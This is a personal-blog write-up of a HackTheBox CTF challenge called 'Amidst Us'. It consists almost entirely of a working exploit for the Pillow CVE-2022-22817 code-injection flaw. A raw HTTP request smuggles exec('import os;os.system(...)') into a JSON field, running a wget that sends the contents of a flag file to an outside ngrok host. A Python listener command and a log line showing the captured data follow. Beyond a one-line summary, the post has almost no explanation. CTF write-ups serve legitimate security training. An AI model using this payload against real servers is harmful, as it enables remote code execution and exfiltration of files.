Rewdog.com

A personal site that's never done

Cyber Apocalypse CTF 2022 from HackTheBox - Amidst Us

Challenge

The AmidstUs tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?

TL;DR

Use PIL CVE-2022-22817 POC to get RCE, in which you cat the flag in the URI of an http request back to your listening server.

Solution

More Coming Soon

POST /api/alphafy HTTP/1.1
Host: 138.68.183.64:30700
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Content-Type: application/json
Content-Length: 4952
Connection: close

iVBORw0KGgoAAAANSUhEUgAAAwUAAAKhCAYAAAABnwI1AAAN50lEQVR4nO3OIQEAMAwEsfdvepNxoAHh2bYHAACclgcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAACglQcAAIBWHgAAAFp5AAAAaOUBAAAg9AHjfqt0bH4TlwAAAABJRU5ErkJggg==","background":["exec('import os;os.system(\"wget http://11-11-11.ngrok.io/?x=$(cat ../flag*)\")')",255,255]}
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
127.0.0.1 - - [17/May/2022 00:28:24] "GET /?x=HTB{i_slept_my_way_to_rce} HTTP/1.1" 200 -